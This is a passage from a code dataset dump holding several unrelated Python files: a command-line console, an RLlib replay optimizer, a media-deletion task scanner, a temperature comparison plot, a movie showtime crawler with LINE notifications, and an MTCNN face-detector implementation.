print(\"** 
class doesn't exist **\")\n\n def do_update(self, arg):\n \"\"\" update an instance based on the class name and 'id' by adding or\n updating attribute\n \"\"\"\n args = shlex.split(arg)\n\n try:\n if args[0] not in models.classes:\n raise NameError\n class_name = args[0]\n except IndexError:\n print(\"** class name missing **\")\n return\n except NameError:\n print(\"** class doesn't exist **\")\n return\n\n try:\n found = 0\n expected_id = args[1]\n objs = models.storage.all()\n for obj_id, obj in objs.items():\n if str(obj.id) == expected_id:\n found = 1\n obj_to_change = obj\n break\n if found == 0:\n raise NameError\n except IndexError:\n print(\"** instance id missing **\")\n return\n except NameError:\n print(\"** no instance found **\")\n return\n\n try:\n expected_attr = args[2]\n except IndexError:\n print(\"** attribute name missing **\")\n return\n\n try:\n setattr(obj_to_change, expected_attr, args[3])\n except IndexError:\n print(\"** value missing **\")\n\n obj_to_change.save()\n\n def emptyline(self):\n \"\"\" Do nothing if empty line \"\"\"\n pass\n\n def do_quit(self, arg):\n \"\"\" Quit command to exit the program\n \"\"\"\n return True\n\n def do_EOF(self, arg):\n \"\"\" Quits the program \"\"\"\n print()\n return True\n\nif __name__ == '__main__':\n HBNBCommand().cmdloop()\n","sub_path":"console.py","file_name":"console.py","file_ext":"py","file_size_in_byte":4806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"605936473","text":"import ray\nfrom ray.rllib.optimizers import SyncReplayOptimizer\nfrom ray.rllib.policy.sample_batch import SampleBatch, DEFAULT_POLICY_ID, MultiAgentBatch\nfrom ray.rllib.utils.compression import pack_if_needed\nfrom ray.rllib.utils.memory import ray_get_and_free\n\n\nclass CustomSyncReplayOptimizer(SyncReplayOptimizer):\n \n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n \n def step(self):\n with self.update_weights_timer:\n if self.remote_evaluators:\n weights = ray.put(self.local_evaluator.get_weights())\n for e in self.remote_evaluators:\n e.set_weights.remote(weights)\n \n with self.sample_timer:\n if self.remote_evaluators:\n batch = SampleBatch.concat_samples(\n ray_get_and_free(\n [e.sample.remote() for e in self.remote_evaluators]))\n else:\n batch = self.local_evaluator.sample()\n \n # Handle everything as if multiagent\n if isinstance(batch, SampleBatch):\n batch = MultiAgentBatch({\n DEFAULT_POLICY_ID: batch\n }, batch.count)\n \n for policy_id, s in batch.policy_batches.items():\n for row in s.rows():\n self.replay_buffers[policy_id].add(\n pack_if_needed(row[\"obs\"]),\n row[\"actions\"],\n row[\"rewards\"],\n pack_if_needed(row[\"new_obs\"]),\n row[\"dones\"],\n weight=None)\n \n if self.num_steps_sampled >= self.replay_starts:\n self._optimize()\n \n self.num_steps_sampled += batch.count\n return batch","sub_path":"hotrl/rllib_experiments/CustomSyncReplayOptimizer.py","file_name":"CustomSyncReplayOptimizer.py","file_ext":"py","file_size_in_byte":1827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"7017739","text":"import json\nimport logging\nimport os\nimport shutil\nfrom datetime import datetime, timedelta\nfrom twisted.internet import threads, reactor\nfrom twisted.internet.task import LoopingCall\n\nfrom domain.Bangumi import Bangumi\nfrom domain.Episode import Episode\nfrom domain.Favorites import Favorites\nfrom domain.Image import Image\nfrom domain.Task import Task\nfrom 
domain.VideoFile import VideoFile\nfrom domain.WatchProgress import WatchProgress\nfrom utils.DownloadManager import download_manager\nfrom utils.SessionManager import SessionManager\nfrom utils.db import row2dict\nfrom utils.http import DateTimeEncoder\n\nlogger = logging.getLogger(__name__)\n\n\nclass DeleteScanner:\n\n def __init__(self, base_path, delete_delay):\n self.interval = 60\n self.base_path = base_path\n self.bangumi_delete_delay = delete_delay['bangumi']\n self.episode_delete_delay = delete_delay['episode']\n\n def start(self):\n lc = LoopingCall(self.scan_delete)\n lc.start(self.interval)\n\n def __unshift_task_step(self, task_content, task, session):\n task_content['task_step'].pop(0)\n task.content = json.dumps(task_content)\n session.commit()\n\n def delete_bangumi(self, bangumi):\n session = SessionManager.Session()\n try:\n # add related information to database\n task_content = {'bangumi_id': str(bangumi.id)}\n episode_list = session.query(Episode).filter(Episode.bangumi_id == bangumi.id).all()\n episode_id_list = [episode.id for episode in episode_list]\n video_file_list = session.query(VideoFile).filter(VideoFile.bangumi_id == bangumi.id).all()\n watch_progress_list = session.query(WatchProgress).filter(WatchProgress.episode_id.in_(episode_id_list)).all()\n favorite_list = session.query(Favorites).filter(Favorites.bangumi_id == bangumi.id).all()\n\n task_content['torrent_id_list'] = list(set([video_file.torrent_id for video_file in video_file_list]))\n task_content['task_step'] = ['db', 'torrent', 'file_system']\n\n task = Task(type=Task.TYPE_BANGUMI_DELETE, content=json.dumps(task_content, cls=DateTimeEncoder), status=Task.STATUS_IN_PROGRESS)\n session.add(task)\n session.commit()\n\n\n # video file\n for video_file in video_file_list:\n session.delete(video_file)\n\n # remove watch-progress\n for watch_progress in watch_progress_list:\n session.delete(watch_progress)\n\n # remove episode\n for episode in episode_list:\n session.delete(episode)\n\n # remove favorites\n for favorite in favorite_list:\n session.delete(favorite)\n\n # remove image\n if bangumi.cover_image_id is not None:\n image = session.query(Image).filter(Image.id == bangumi.cover_image_id).one()\n session.delete(image)\n\n # remove bangumi\n session.delete(bangumi)\n\n self.__unshift_task_step(task_content, task, session)\n\n if len(task_content['torrent_id_list']) > 0:\n # remove torrent from deluge\n try:\n threads.blockingCallFromThread(reactor, download_manager.remove_torrents, task_content['torrent_id_list'], False)\n except Exception as error:\n logger.warn(error)\n self.__unshift_task_step(task_content, task, session)\n\n # remove files of bangumi\n bangumi_folder_path = '{0}/{1}'.format(self.base_path, str(bangumi.id))\n shutil.rmtree(bangumi_folder_path, ignore_errors=True)\n task_content['task_step'].pop(0)\n task.content = json.dumps(task_content)\n task.status = Task.STATUS_COMPLETE\n session.commit()\n\n return str(task.id)\n finally:\n SessionManager.Session.remove()\n\n def delete_episode(self, episode):\n session = SessionManager.Session()\n try:\n task_content = {'episode_id': str(episode.id)}\n video_file_list = session.query(VideoFile).\\\n filter(VideoFile.episode_id == episode.id).\\\n all()\n\n watch_progress_list = session.query(WatchProgress).filter(\n WatchProgress.episode_id == episode.id).all()\n\n task_content['video_file_list'] = [row2dict(video_file) for video_file in video_file_list]\n\n task_content['task_step'] = ['db', 'torrent', 'file_system']\n\n task = 
Task(type=Task.TYPE_EPISODE_DELETE, content=json.dumps(task_content, cls=DateTimeEncoder), status=Task.STATUS_IN_PROGRESS)\n session.add(task)\n session.commit()\n\n for video_file in video_file_list:\n session.delete(video_file)\n\n # remove watch-progress\n for watch_progress in watch_progress_list:\n session.delete(watch_progress)\n\n # remove image\n if episode.thumbnail_image_id is not None:\n image = session.query(Image).filter(Image.id == episode.thumbnail_image_id).one()\n session.delete(image)\n\n # remove episode\n session.delete(episode)\n\n self.__unshift_task_step(task_content, task, session)\n\n # remove torrent\n if len(task_content['video_file_list']) > 0:\n threads.blockingCallFromThread(reactor, download_manager.remove_torrents, task_content['video_file_list']['torrent_id'], True)\n\n self.__unshift_task_step(task_content, task, session)\n\n # remove files of episode\n bangumi_folder_path = '{0}/{1}'.format(self.base_path, str(episode.bangumi_id))\n for torrent_file in task_content['video_file_list']:\n file_path = '{0}/{1}'.format(bangumi_folder_path, torrent_file['file_path'])\n os.remove(file_path)\n\n task_content['task_step'].pop(0)\n task.content = json.dumps(task_content)\n task.status = Task.STATUS_COMPLETE\n\n session.commit()\n return str(task.id)\n\n finally:\n SessionManager.Session.remove()\n\n def __dispatch_delete_bangumi(self, bangumi_list):\n for bangumi in bangumi_list:\n d = threads.deferToThread(self.delete_bangumi, bangumi)\n d.addCallback(self.__on_delete_callback)\n d.addErrback(self.__on_delete_errCallback)\n\n def __dispatch_delete_episode(self, episode_list):\n for episode in episode_list:\n d = threads.deferToThread(self.delete_episode, episode)\n d.addCallback(self.__on_delete_callback)\n d.addErrback(self.__on_delete_errCallback)\n\n def __on_delete_callback(self, id):\n logger.debug('delete task id#{0} added'.format(id,))\n\n def __on_delete_errCallback(self, err):\n logger.error(err, exc_info=True)\n\n def __query_error(self, err):\n logger.error(err, exc_info=True)\n\n def scan_bangumi(self):\n session = SessionManager.Session()\n try:\n task_list = session.query(Task).\\\n filter(Task.status != Task.STATUS_COMPLETE).\\\n filter(Task.type == Task.TYPE_BANGUMI_DELETE).\\\n all()\n bangumi_id_in_task = []\n for task in task_list:\n content_dict = json.loads(task.content)\n bangumi_id_in_task.append(content_dict['bangumi_id'])\n\n latest_delete_time = datetime.now() - timedelta(minutes=self.bangumi_delete_delay)\n\n query = session.query(Bangumi)\n\n if len(bangumi_id_in_task) > 0:\n query = query.filter(Bangumi.id.notin_(bangumi_id_in_task))\n\n bangumi_list = query.\\\n filter(Bangumi.delete_mark != None).\\\n filter(Bangumi.delete_mark <= latest_delete_time).\\\n all()\n\n return bangumi_list\n finally:\n SessionManager.Session.remove()\n\n def scan_episode(self):\n session = SessionManager.Session()\n try:\n task_list = session.query(Task). \\\n filter(Task.status != Task.STATUS_COMPLETE). 
\\\n filter((Task.type == Task.TYPE_EPISODE_DELETE) | (Task.type == Task.TYPE_BANGUMI_DELETE)).\\\n all()\n episode_id_in_task = []\n bangumi_id_in_task = []\n for task in task_list:\n content_dict = json.loads(task.content)\n if task.type == Task.TYPE_EPISODE_DELETE:\n episode_id_in_task.append(content_dict['episode_id'])\n else:\n bangumi_id_in_task.append(content_dict['bangumi_id'])\n\n latest_delete_time = datetime.now() - timedelta(minutes=self.episode_delete_delay)\n\n query = session.query(Episode)\n\n if len(episode_id_in_task) > 0:\n query = query.filter(Episode.id.notin_(episode_id_in_task))\n\n if len(bangumi_id_in_task) > 0:\n query = query.filter(Episode.bangumi_id.notin_(bangumi_id_in_task))\n\n episode_list = query.\\\n filter(Episode.delete_mark != None).\\\n filter(Episode.delete_mark <= latest_delete_time).\\\n all()\n\n return episode_list\n finally:\n SessionManager.Session.remove()\n\n def scan_delete(self):\n logger.info('scan delete')\n bgm_d = threads.deferToThread(self.scan_bangumi)\n bgm_d.addCallback(self.__dispatch_delete_bangumi)\n bgm_d.addErrback(self.__query_error)\n\n eps_d = threads.deferToThread(self.scan_episode)\n eps_d.addCallback(self.__dispatch_delete_episode)\n eps_d.addErrback(self.__query_error)\n","sub_path":"taskrunner/DeleteScanner.py","file_name":"DeleteScanner.py","file_ext":"py","file_size_in_byte":9821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"283241945","text":"# Sitka-Death Valley Comparison: The temperature scales on the Sitka and\n# Death Valley graphs reflect the different ranges of the data. To\n# accurately compare the temperature range in Sitka to that of Death\n# Valley, you need identical scales on the y-axis. Change the settings\n# for the y-axis on one or both of the charts in Figures 16-5 and 16-6,\n# and make a direct comparison between temperature ranges in Sitka and\n# Death Valley (or any two places you want to compare). 
You can also try\n# plotting the two data sets on the same chart.\n\nimport csv\nfrom datetime import datetime\n\nfrom matplotlib import pyplot as plt\n\nfrom read_data import ReadData as RD\n\n# Get dates, high and low temperatures from file.\nfilename_1 = RD('sitka_weather_2014.csv')\nfilename_1.read_data()\n\nfilename_2 = RD('death_valley_2014.csv')\nfilename_2.read_data()\n\n# Plot data.\nfig = plt.figure(dpi=128, figsize=(10, 6))\n\n# For filename_1\nplt.plot(filename_1.dates, filename_1.highs, c='green', alpha=0.8, label='high Sitka, Alaska')\nplt.plot(filename_1.dates, filename_1.lows, c='blue', alpha=0.8, label='low Sitka, Alaska')\nplt.fill_between(filename_1.dates, filename_1.highs, filename_1.lows, facecolor='blue', alpha=0.6)\n\n# For filename_2\nplt.plot(filename_2.dates, filename_2.highs, c='red', alpha=0.2, label='high Death Valley, California')\nplt.plot(filename_2.dates, filename_2.lows, c='orange', alpha=0.2, label='high Death Valley, California')\nplt.fill_between(filename_2.dates, filename_2.highs, filename_2.lows, facecolor='orange', alpha=0.1)\n\n# Format plot.\nplt.title(\"Daily high and low temperatures \\nDeath Valley, California, 2014\", fontsize=20)\nplt.xlabel(\"\", fontsize=16)\nfig.autofmt_xdate()\nplt.ylabel(\"Temperature (F)\", fontsize=16)\nplt.tick_params(axis='both', which='major', labelsize=16)\nplt.legend(loc='upper left')\n\nplt.show()","sub_path":"Chapter 16 - Downloading Data/comparison.py","file_name":"comparison.py","file_ext":"py","file_size_in_byte":1829,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"438481154","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom apscheduler.schedulers.blocking import BlockingScheduler\n\nurl = 'http://www.cgv.co.kr/common/showtimes/iframeTheater.aspx?areacode=01&theatercode=0074&date=20200218'\n\n\nTOKEN = ''\nTARGET_URL = 'https://notify-api.line.me/api/notify'\n\ndef job_function():\n html = requests.get(url)\n soup = BeautifulSoup(html.text, 'html.parser')\n imax = soup.select_one('span.imax')\n if(imax):\n imax = imax.find_parent('div',class_='col-times')\n title = imax.select_one('div.info-movie > a > strong').text.strip()\n response = requests.post(\n TARGET_URL,\n headers={\n 'Authorization': 'Bearer ' + TOKEN\n },\n data={\n 'message': title + ' Open!'\n }\n )\n print(response.text)\n sched.pause()\n\nsched = BlockingScheduler()\nsched.add_job(job_function, 'interval', seconds=30)\nsched.start()\n","sub_path":"film_crawler.py","file_name":"film_crawler.py","file_ext":"py","file_size_in_byte":951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"307499764","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport inspect\nimport itertools\nimport math\nimport os\nimport uuid\nfrom collections import *\nfrom collections import deque\nfrom copy import copy, deepcopy\nfrom functools import partial\nfrom itertools import repeat\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nfrom matplotlib.collections import PolyCollection\nfrom collections import abc\nfrom torch.nn import init\nfrom torch.nn.parameter import Parameter\nfrom trident.backend.opencv_backend import image2array\n\nfrom trident.backend.common import *\nfrom trident.backend.tensorspec import *\nfrom trident.backend.pytorch_backend import *\nfrom trident.backend.pytorch_backend import to_numpy, to_tensor, Layer, 
Sequential, Combine, load,get_device,fix_layer\nfrom trident.backend.pytorch_ops import *\nfrom trident.data.bbox_common import clip_boxes_to_image, nms\nfrom trident.data.image_common import *\nfrom trident.data.utils import download_model_from_google_drive\nfrom trident.layers.pytorch_activations import get_activation, Identity, PRelu\nfrom trident.layers.pytorch_blocks import *\nfrom trident.layers.pytorch_layers import *\nfrom trident.layers.pytorch_normalizations import get_normalization\nfrom trident.layers.pytorch_pooling import *\nfrom trident.optims.pytorch_trainer import *\nfrom trident.optims.pytorch_trainer import ImageDetectionModel\nfrom trident.data.vision_transforms import Resize,Normalize\n__all__ = ['Pnet','Rnet','Onet','Mtcnn']\n\n_session = get_session()\n_device = get_device()\n_epsilon=_session.epsilon\n_trident_dir=_session.trident_dir\n\n\ndirname = os.path.join(_trident_dir, 'models')\nif not os.path.exists(dirname):\n try:\n os.makedirs(dirname)\n except OSError:\n # Except permission denied and potential race conditions\n # in multi-threaded environments.\n pass\n\n\ndef p_net():\n return Sequential(\n Conv2d((3,3),10,strides=1,auto_pad=False,use_bias=True,name='conv1'),\n PRelu(num_parameters=1),\n MaxPool2d((2,2),strides=2,auto_pad=False),\n Conv2d((3, 3), 16, strides=1, auto_pad=False,use_bias=True,name='conv2'),\n PRelu(num_parameters=1),\n Conv2d((3,3),32,strides=1,auto_pad=False,use_bias=True,name='conv3'),\n PRelu(num_parameters=1),\n ModuleDict(\n {'conv4_1':Conv2d((1,1),1,strides=1,auto_pad=False,use_bias=True,activation='sigmoid',name='conv4_1'),\n 'conv4_2' :Conv2d((1,1),4,strides=1,auto_pad=False,use_bias=True,name='conv4_2'),\n 'conv4_3':Conv2d((1,1),10,strides=1,auto_pad=False,use_bias=True,name='conv4_3')},is_multicasting = True)\n ,name='pnet')\n\n\n\ndef r_net():\n return Sequential(\n Conv2d((3,3),28,strides=1,auto_pad=False,use_bias=True,name='conv1'),\n PRelu(num_parameters=1),\n MaxPool2d((3,3),strides=2,auto_pad=False),\n Conv2d((3, 3), 48, strides=1, auto_pad=False,use_bias=True,name='conv2'),\n PRelu(num_parameters=1),\n MaxPool2d((3,3),strides=2,auto_pad=False),\n Conv2d((2,2),64,strides=1,auto_pad=False,use_bias=True,name='conv3'),\n PRelu(num_parameters=1),\n Flatten(),\n Dense(128,activation=None,use_bias=True,name='conv4'),\n PRelu(num_parameters=1),\n ModuleDict({\n 'conv5_1' :Dense(1,activation='sigmoid',use_bias=True,name='conv5_1'),\n 'conv5_2':Dense(4,activation=None,use_bias=True,name='conv5_2'),\n 'conv5_3':Dense(10,activation=None,use_bias=True,name='conv5_3')},is_multicasting = True)\n ,name='rnet')\n\n\n\ndef o_net():\n return Sequential(\n Conv2d((3,3),32,strides=1,auto_pad=False,use_bias=True,name='conv1'),\n PRelu(num_parameters=1),\n MaxPool2d((3,3),strides=2,auto_pad=False),\n Conv2d((3, 3), 64, strides=1, auto_pad=False,use_bias=True,name='conv2'),\n PRelu(num_parameters=1),\n MaxPool2d((3,3),strides=2,auto_pad=False),\n Conv2d((3,3),64,strides=1,auto_pad=False,use_bias=True,name='conv3'),\n PRelu(num_parameters=1),\n MaxPool2d((2, 2), strides=2,auto_pad=False),\n Conv2d((2, 2), 128, strides=1, auto_pad=False,use_bias=True,name='conv4'),\n PRelu(num_parameters=1),\n Flatten(),\n Dense(256,activation=None,use_bias=True,name='conv5'),\n PRelu(num_parameters=1),\n ModuleDict({\n 'conv6_1':Dense(1,activation='sigmoid',use_bias=True,name='conv6_1'),\n 'conv6_2':Dense(4,activation=None,use_bias=True,name='conv6_2'),\n 'conv6_3':Dense(10,activation=None,use_bias=True,name='conv6_3')},is_multicasting = True)\n 
,name='onet')\n\n\n\ndef Pnet(pretrained=True,\n input_shape=(3,12,12),\n freeze_features=True,\n **kwargs):\n if input_shape is not None and len(input_shape) == 3:\n input_shape = tuple(input_shape)\n else:\n input_shape = (3, 224, 224)\n pnet = ImageDetectionModel(input_shape=(3,12,12),output=p_net())\n if pretrained == True:\n download_model_from_google_drive('1w9ahipO8D9U1dAXMc2BewuL0UqIBYWSX', dirname, 'pnet.pth')\n recovery_model = fix_layer(load(os.path.join(dirname, 'pnet.pth')))\n pnet.model = recovery_model\n\n pnet.model.input_shape = input_shape\n pnet.model.to(_device)\n return pnet\n\n\ndef Rnet(pretrained=True,\n input_shape=(3,24,24),\n **kwargs):\n if input_shape is not None and len(input_shape)==3:\n input_shape=tuple(input_shape)\n else:\n input_shape=(3,24,24)\n rnet =ImageDetectionModel(input_shape=(3,24,24),output=r_net())\n rnet.preprocess_flow = [Normalize(0, 255), image_backend_adaption]\n if pretrained==True:\n download_model_from_google_drive('1CH7z133_KrcWMx9zXAblMCV8luiQ3wph',dirname,'rnet.pth')\n recovery_model=load(os.path.join(dirname,'rnet.pth'))\n recovery_model = fix_layer(recovery_model)\n recovery_model.to(_device)\n rnet.model=recovery_model\n return rnet\n\ndef Onet(pretrained=True,\n input_shape=(3,48,48),\n **kwargs):\n if input_shape is not None and len(input_shape)==3:\n input_shape=tuple(input_shape)\n else:\n input_shape=(3,48,48)\n onet =ImageDetectionModel(input_shape=(3,48,48),output=o_net())\n onet.preprocess_flow = [Normalize(0, 255), image_backend_adaption]\n if pretrained==True:\n download_model_from_google_drive('1a1dAlSzJOAfIz77Ic38JMQJYWDG_b7-_',dirname,'onet.pth')\n recovery_model=load(os.path.join(dirname,'onet.pth'))\n recovery_model = fix_layer(recovery_model)\n recovery_model.to(_device)\n onet.model=recovery_model\n return onet\n\n\n\nclass DetectorHead(Layer):\n def __init__(self, cellsize=12,threshold=0.5, min_size=5,**kwargs):\n super(DetectorHead, self).__init__(**kwargs)\n self.cellsize=cellsize\n self.threshold=threshold\n self.min_size=min_size\n\n self._built =True\n\n def forward(self, input,**kwargs):\n boxprobs,boxregs,landscape=input\n boxprobs=boxprobs[0]\n height,width=boxprobs.shape[1:]\n if boxprobs.size(0)==2:\n boxprobs=boxprobs[1:,:,:]\n strides=2\n boxregs=boxregs[0]\n input_shape=boxprobs.size()\n grid=meshgrid(boxprobs.size(1),boxprobs.size(2))\n grid=grid.view(2,-1)\n score = boxprobs[0]\n y,x = torch.where(score>= self.threshold)\n boxregs = boxregs.permute(1,2,0)\n\n score = score[(y,x )]\n reg=boxregs[(y,x )].transpose(1,0)\n bb = torch.stack([x,y], dim=0)\n\n q1 = (strides * bb + 1)\n q2 =(strides * bb +self.cellsize - 1 + 1)\n\n w = q2[0, :] - q1[0, :] + 1\n h = q2[1, :] - q1[1, :] + 1\n\n\n b1 = q1[0, :] + reg[0, :] * w\n b2 = q1[1, :] + reg[1, :] * h\n b3 =q2[0, :] + reg[2, :] * w\n b4 =q2[1, :] + reg[3, :] * h\n\n boxs=torch.stack([b1,b2,b3,b4,score],dim=-1)\n #keep =torchvision.ops.boxes.remove_small_boxes(boxs[:,:4],min_size=self.min_size)\n #boxs=boxs[keep]\n #print('total {0} boxes cutoff={1} '.format(len(x), cutoff))\n if boxs is None or len(boxs.size()) == 0:\n return None\n elif len(boxs.size())==1:\n boxs=boxs.unsqueeze(0)\n return boxs\n\ndef remove_useless_boxes(boxes,image_size=None,min_size=5):\n height, width = image_size if image_size is not None else (None,None)\n\n x1, y1, x2, y2, score = [boxes[:, i] for i in range(5)]\n area = (x2 - x1 + 1) * (y2 - y1 + 1)\n boxes=boxes[area>min_size*min_size]\n x1, y1, x2, y2, score = [boxes[:, i] for i in range(5)]\n greater0=x1.gt(0).float() * 
x2.gt(0).float() * y1.gt(0).float() * y1.gt(0).float()\n boxes=boxes[greater0>0]\n x1, y1, x2, y2, score = [boxes[:, i] for i in range(5)]\n w=(x2 - x1 )\n boxes=boxes[w>1]\n x1, y1, x2, y2, score = [boxes[:, i] for i in range(5)]\n h=(y2 - y1)\n boxes = boxes[h > 1]\n\n\n return boxes\n\n\n\ndef calibrate_box(bboxes, offsets):\n \"\"\"\n Transform bounding boxes to be more like true bounding boxes.\n 'offsets' is one of the outputs of the nets.\n \"\"\"\n x1, y1, x2, y2 = [bboxes[:, i] for i in range(4)]\n w = x2 - x1 + 1.0\n h = y2 - y1 + 1.0\n # w [w_len, 1]\n w = torch.unsqueeze(w, 1)\n # h [h_len, 1]\n h = torch.unsqueeze(h, 1)\n\n translation = torch.cat([w, h, w, h],-1) * offsets\n bboxes[:, 0:4] = bboxes[:, 0:4] + translation\n return bboxes\n\n\n\n# class Mtcnn(ImageDetectionModel):\n# def __init__(self, pretrained=True, min_size=10,verbose=True, **kwargs):\n# self.verbose = verbose\n# pnet =p_net()\n# self.rnet = ImageDetectionModel(input_shape=(3, 24, 24), output=r_net())._model\n# self.onet = ImageDetectionModel(input_shape=(3, 48, 48), output=o_net())._model\n# if pretrained == True:\n# pnet =Pnet()._model\n# self.rnet = Rnet()._model\n# self.onet = Onet()._model\n# self.min_size = min_size\n#\n#\n#\n# super(Mtcnn, self).__init__(input_shape=(3,224,224),output=pnet)\n# self.pnet=pnet\n#\n# self.signature = get_signature(self._model.forward)\n# #data preprocess\n# self.preprocess_flow =[Normalize(0,255)]\n# self.nms_threshold = [0.9, 0.9, 0.3]\n# self.detection_threshold = [0.5, 0.6, 0.9]\n#\n# pnet.add_module('pnet_detector', DetectorHead(cellsize=12, threshold=0.5, min_size=self.min_size))\n#\n#\n# def get_image_pyrimid(self,img,min_size=None,factor= 0.709):\n# if min_size is None:\n# min_size=self.min_size\n# min_face_area = (min_size, min_size)\n# h = img.shape[0]\n# w = img.shape[1]\n# minl = np.amin([h, w])\n# m = 12.0 / min_size\n# minl = minl * m\n# # create scale pyramid\n# scales = []\n# images = []\n# factor_count = 0\n# while minl >= 12:\n# scales += [m * np.power(factor, factor_count)]\n# scaled_img = rescale(scales[-1])(img.copy())\n# if img is not None:\n# for func in self.preprocess_flow:\n# if inspect.isfunction(func):\n# scaled_img=func(scaled_img)\n# images.append(image_backend_adaption(scaled_img))\n# minl = minl * factor\n# factor_count += 1\n# return images, scales\n#\n# #adjust bbox like square\n# def rerec(self, bboxA, img_shape):\n# \"\"\"Convert bboxA to square.\"\"\"\n#\n# h = bboxA[:, 3] - bboxA[:, 1]\n# w = bboxA[:, 2] - bboxA[:, 0]\n# max_len = maximum(w, h)\n#\n# bboxA[:, 0] = round(bboxA[:, 0] - 0.5 * (max_len - w), 0)\n# bboxA[:, 1] = round(bboxA[:, 1] - 0.5 * (max_len - h), 0)\n# bboxA[:, 2] = bboxA[:, 0] + max_len\n# bboxA[:, 3] = bboxA[:, 1] + max_len\n# return bboxA\n#\n# # 計算面積\n# def area_of(self,left_top, right_bottom):\n# \"\"\"Compute the areas of rectangles given two corners.\n#\n# Args:\n# left_top (N, 2): left top corner.\n# right_bottom (N, 2): right bottom corner.\n#\n# Returns:\n# area (N): return the area.\n# \"\"\"\n# hw = right_bottom - left_top\n# return clip(hw[..., 0], min=0) * clip(hw[..., 1], min=0)\n#\n# # 計算IOU(交集/聯集)\n# def iou_of(self,boxes0, boxes1, eps=1e-5):\n# \"\"\"Return intersection-over-union (Jaccard index) of boxes.\n#\n# Args:\n# boxes0 (N, 4): ground truth boxes.\n# boxes1 (N or 1, 4): predicted boxes.\n# eps: a small number to avoid 0 as denominator.\n# Returns:\n# iou (N): IoU values.\n# \"\"\"\n# overlap_left_top = maximum(boxes0[..., :2], boxes1[..., :2])\n# overlap_right_bottom = minimum(boxes0[..., 
2:], boxes1[..., 2:])\n#\n# overlap_area = self.area_of(overlap_left_top, overlap_right_bottom)\n# area0 = self.area_of(boxes0[..., :2], boxes0[..., 2:])\n# area1 = self.area_of(boxes1[..., :2], boxes1[..., 2:])\n# return overlap_area / (area0 + area1 - overlap_area + eps)\n#\n# # 基於tensor計算nms\n# def boxes_nms(self,box_scores, overlap_threshold=0.5, top_k=-1):\n# \"\"\"Non-maximum suppression.\n# Arguments:\n# box_scores: a float numpy array of shape [n, 5],\n# where each row is (xmin, ymin, xmax, ymax, score).\n# overlap_threshold: a float number.\n# Returns:\n# list with indices of the selected boxes\n# \"\"\"\n# # 如果沒有有效的候選區域則回傳空的清單\n# box_scores = to_tensor(box_scores)\n# if len(box_scores) == 0:\n# return []\n# score = box_scores[:, 4]\n# boxes = box_scores[:, :4]\n# # 存放過關的索引值\n# picked = []\n# # 依照機率信心水準升冪排序\n# indexes = argsort(score, descending=False)\n#\n# while len(indexes) > 0:\n# # 如此一來,最後一筆即是信心水準最高值\n# # 加入至過關清單中\n# current = indexes[-1]\n# picked.append(current.item())\n#\n# # 計算其餘所有候選框與此當前框之間的IOU\n#\n# if 0 < top_k == len(picked) or len(indexes) == 1:\n# break\n# current_box = boxes[current, :]\n# current_score = score[current]\n# # 除了最後一筆以外的都是其餘框\n# indexes = indexes[:-1]\n# rest_boxes = boxes[indexes, :]\n# iou = self.iou_of(\n# rest_boxes,\n# expand_dims(current_box, axis=0),\n# )\n# # IOU未超過門檻值的表示未與當前框重疊,則留下,其他排除\n# indexes = indexes[iou <= overlap_threshold]\n# return box_scores[picked]\n#\n#\n# def infer_single_image(self,img,**kwargs):\n# if self.model.built:\n# self.model.to(self.device)\n# self.model.eval()\n# img=image2array(img)\n# if img.shape[-1]==4:\n# img=img[:,:,:3]\n#\n# imgs,scales=self.get_image_pyrimid(img)\n# boxes_list=[]\n# for i in range(len(scales)):\n# scaled_img=imgs[i]\n# inp =to_tensor(expand_dims(scaled_img, 0)).to(torch.device(\"cuda\" if self.pnet.weights[0].data.is_cuda else \"cpu\")).to(self.pnet.weights[0].data.dtype)\n#\n# boxes=self.pnet(inp)\n# if boxes is not None and len(boxes)>0:\n# scale=scales[i]\n# box=boxes[:,:4]/scale\n# score=boxes[:,4:]\n# boxes = torch.cat([box.round_(), score], dim=1)\n# if len(boxes) > 0:\n# boxes_list.append(boxes)\n#\n# #######################################\n# #########pnet finish\n# #######################################\n# if len(boxes_list) > 0:\n# boxes=to_tensor(torch.cat(boxes_list, dim=0))\n#\n# #print('total {0} boxes in pnet in all scale '.format(len(boxes)))\n# boxes=clip_boxes_to_image(boxes,(img.shape[0],img.shape[1]))\n# boxes =self.boxes_nms(boxes, overlap_threshold=self.detection_threshold[0])\n# if self.verbose:\n# print('pnet:{0} boxes '.format(len(boxes)))\n# #print('total {0} boxes after nms '.format(len(boxes)))\n# #score = to_numpy(boxes[:, 4]).reshape(-1)\n# if boxes is not None:\n# #prepare rnet input\n#\n# boxes= self.rerec(boxes, img.shape)\n# new_arr = np.zeros((boxes.shape[0], 3, 24, 24))\n#\n# for k in range(boxes.shape[0]):\n# box = boxes[k]\n# crop_img = img.copy()[int(box[1]):int(box[3]), int(box[0]):int(box[2]), :]\n# if crop_img.shape[0] > 0 and crop_img.shape[1] > 0:\n# new_arr[k] = Resize((24, 24))(crop_img).transpose([2, 0, 1]) / 255.0\n# # else:\n# # print(box)\n# new_arr = to_tensor(new_arr)\n# r_output1_list = []\n# r_output2_list = []\n# r_output3_list = []\n# if len(new_arr) > 16:\n# for i in range(len(new_arr) // 16 + 1):\n# if i * 16 < len(new_arr):\n# r_out1, r_out2, r_out3 = self.rnet(new_arr[i * 16:(i + 1) * 16, :, :, :])\n# r_output1_list.append(r_out1)\n# r_output2_list.append(r_out2)\n# r_output3_list.append(r_out3)\n# r_out1 = torch.cat(r_output1_list, 
